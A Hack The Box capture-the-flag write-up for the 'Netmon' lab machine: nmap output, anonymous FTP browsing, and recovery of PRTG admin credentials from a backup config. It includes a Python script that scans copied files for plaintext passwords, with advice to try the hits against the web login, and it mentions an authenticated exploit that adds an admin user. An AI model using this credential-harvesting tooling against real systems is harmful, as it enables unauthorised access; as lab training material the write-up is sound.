Hackthebox: Netmon Write-up

Recon

As always, I started off with an NMAP scan. With an open FTP port showing what looks like the contents of the typical "C:\" directory of a Windows box, I decided to mount it and start going through there immediately.

21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Whelp, user.txt was directly accessible in the FTP directories, but with the prevalence of plaintext passwords out in the wild this isn't as silly a thing as you might think.

After that, I decided to start looking into the webserver, but after some injection testing got me nowhere I did some research and found that the application in use, "PRTG Network Monitor", has a known issue with caching plaintext credentials in .dat files.

This took a while to search through, and after coming across some .dat files containing nothing but encrypted passwords (which I didn't end up cracking) I decided to buckle down and start searching through the program files.

This led me to a .bat file that pointed to a hidden folder on the FTP server, which was accessible but not visible, even when running 'ls -la'. Lesson learned with FTP servers: even with 'view hidden files' enabled and the -a flag, a hidden directory on a Windows server may not be listed, so cd into the path by name rather than trusting the listing.

I copied most of these files off the FTP server to look through them more easily and hit paydirt with the file 'PRTG Configuration.old.bak', which gave the credentials for the prtgadmin user of the web application.
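Searching a pile of pulled-down .dat/.old/.bak files by hand is slow, so here is an added example (my own code, not part of the original write-up) that walks a directory of copied files and pulls out every PRTG-style `<dbpassword>` entry, reporting which ones carry the `<flags><encrypted/></flags>` marker and which are sitting in plaintext. It assumes the backup uses the XML-like PRTG configuration layout where each `<user>` node has a `<login>` and a `<dbpassword>`; the two sample files below are constructed for the demo and do not reproduce the real box's contents, and the password and encrypted blob in them are placeholders.

```python
"""
Added example: scan copied PRTG configuration files for <dbpassword> entries
and separate plaintext values from ones marked encrypted.

Assumptions (not taken from the write-up): each <user> element contains a
<login> and a <dbpassword>; an encrypted value is tagged with
<flags><encrypted/></flags>. The sample texts below are constructed.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# File types worth opening in a PRTG data directory. The write-up found the
# credentials in "PRTG Configuration.old.bak", a rotated copy of the live .dat.
INTERESTING_SUFFIXES = (".dat", ".old", ".bak")

USER_BLOCK = re.compile(r"<user>(.*?)</user>", re.S)
LOGIN = re.compile(r"<login>\s*(.*?)\s*</login>", re.S)
DBPASSWORD = re.compile(r"<dbpassword>(.*?)</dbpassword>", re.S)
FLAGS = re.compile(r"<flags>.*?</flags>", re.S)
COMMENT = re.compile(r"<!--.*?-->", re.S)

# Constructed sample of a live config: the value is flagged as encrypted.
SAMPLE_DAT = """
<user>
  <login>prtgadmin</login>
  <dbpassword>
    <flags>
      <encrypted/>
    </flags>
    ABCDEFGHIJKLMNOPQRSTUVWXYZ234567ABCDEFGHIJKLMNOP====
  </dbpassword>
</user>
"""

# Constructed sample of an older backup: same user, value left in plaintext.
SAMPLE_OLD_BAK = """
<user>
  <login>prtgadmin</login>
  <dbpassword>
    <!-- User: prtgadmin -->
    S3cretPassw0rd!
  </dbpassword>
</user>
"""


@dataclass
class Credential:
    login: str
    value: str
    encrypted: bool
    source: str


def extract_credentials(text: str, source: str = "<memory>") -> list:
    """Return every <login>/<dbpassword> pair found in `text`."""
    found = []
    for block in USER_BLOCK.finditer(text):
        body = block.group(1)
        login_m = LOGIN.search(body)
        pw_m = DBPASSWORD.search(body)
        if not login_m or not pw_m:
            continue
        pw_body = pw_m.group(1)
        encrypted = "<encrypted/>" in pw_body
        # Drop the <flags> element and any comments, leaving the bare value.
        value = COMMENT.sub("", FLAGS.sub("", pw_body)).strip()
        found.append(Credential(login_m.group(1), value, encrypted, source))
    return found


def scan_tree(root: str) -> list:
    """Walk `root` and extract credentials from every interesting file."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(INTERESTING_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                results.extend(extract_credentials(fh.read(), path))
    return results


def plaintext_only(creds: list) -> list:
    """Keep only entries whose value was not flagged as encrypted."""
    return [c for c in creds if not c.encrypted]


def demo() -> list:
    """Write the two constructed samples to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        data_dir = os.path.join(tmp, "PRTG Network Monitor")
        os.makedirs(data_dir)
        for name, text in (("PRTG Configuration.dat", SAMPLE_DAT),
                           ("PRTG Configuration.old.bak", SAMPLE_OLD_BAK),
                           ("readme.txt", SAMPLE_OLD_BAK)):  # skipped by suffix
            with open(os.path.join(data_dir, name), "w", encoding="utf-8") as fh:
                fh.write(text)
        return scan_tree(tmp)


if __name__ == "__main__":
    for cred in demo():
        state = "ENCRYPTED" if cred.encrypted else "PLAINTEXT"
        print(f"{state:9} {cred.login}: {cred.value}  ({os.path.basename(cred.source)})")
```

Point the scanner at the directory you mirrored from FTP instead of `demo()`; the plaintext hits are the ones to try against the web login first, and the encrypted ones tell you which accounts exist even if you never recover their values.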

Foothold & Admin

The network monitor tool has a lot to look through, but I ran searchsploit with 'prtg' and found a rather recent exploit that allows an authenticated user to add an admin user account on the server. This works because the network monitoring tool itself runs with administrative privileges, and the exploit only requires you to log in and copy off the session cookie you get after logging in.

Always fun using a recently published exploit

Just like that, we have an admin account on the box and have grabbed root.txt! Not much in the way of new lessons learned on this one, but it was fun to use an exploit published for an application widely in use out in the wild. It was also interesting that, while doing my enumeration on the application, I found numerous threads on Reddit and other blogs about how upset people were over the company's screw-up. Plaintext credentials are definitely a thing!